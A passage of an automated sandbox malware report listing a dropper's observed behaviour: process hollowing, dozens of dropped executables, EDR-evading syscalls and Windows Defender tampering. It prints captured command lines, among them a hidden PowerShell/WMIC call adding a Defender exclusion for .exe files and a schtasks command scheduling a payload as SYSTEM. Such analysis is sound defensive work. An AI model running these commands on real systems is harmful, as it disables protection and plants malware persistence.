                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_00409C06 SetUnhandledExceptionFilter,21_2_00409C06
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00409EBE
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0041073B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_041C9CDA
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C9E6D SetUnhandledExceptionFilter,21_2_041C9E6D
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_041CA125
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041D09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_041D09A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Disables Windows Defender (deletes autostart)
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtQuerySystemInformation: Indirect: 0x1406173E4
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtSetInformationThread: Indirect: 0x14066CAF7
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x456867
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtQueryInformationProcess: Indirect: 0x140662896
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtQueryInformationProcess: Indirect: 0x140683C42
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x6169D145
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                        Sample uses process hollowing technique
                        Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000Jump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6C2008Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe "C:\Users\user\AppData\Local\Temp\u5v8.0.exe" Jump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" Jump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess created: C:\Users\user\AppData\Local\Temp\u69w.0.exe "C:\Users\user\AppData\Local\Temp\u69w.0.exe"
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess created: C:\Users\user\AppData\Local\Temp\u69w.1.exe "C:\Users\user\AppData\Local\Temp\u69w.1.exe"
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeProcess created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeProcess created: unknown unknown
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409D1B cpuid 4_2_00409D1B
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00420063
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: GetLocaleInfoW,4_2_004208CE
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: EnumSystemLocalesW,4_2_004170F1
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0042099B
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: EnumSystemLocalesW,4_2_004202DB
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: EnumSystemLocalesW,4_2_00420326
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: EnumSystemLocalesW,4_2_004203C1
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0042044E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: GetLocaleInfoW,4_2_004174E4
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: GetLocaleInfoW,4_2_0042069E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004207C7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00420063
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_004208CE
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_004170F1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0042099B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_004202DB
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_00420326
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_004203C1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0042044E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_004174E4
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_0042069E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004207C7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_05BD058D
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_05BD0542
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_05BD0C02
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_05BC774B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_05BD0628
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_05BD0905
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_05BD0903
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,11_2_05BD0B35
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: EnumSystemLocalesW,11_2_05BC7358
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_05BD02CA
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_05BD0A2E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_00420063
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_004208CE
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_004170F1
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_0042099B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_004202DB
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_00420326
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_004203C1
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_0042044E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_004174E4
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_0042069E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_004207C7
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_05D0058D
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_05D00542
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_05D00C02
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_05CF774B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_05D00628
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_05D00903
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_05D00905
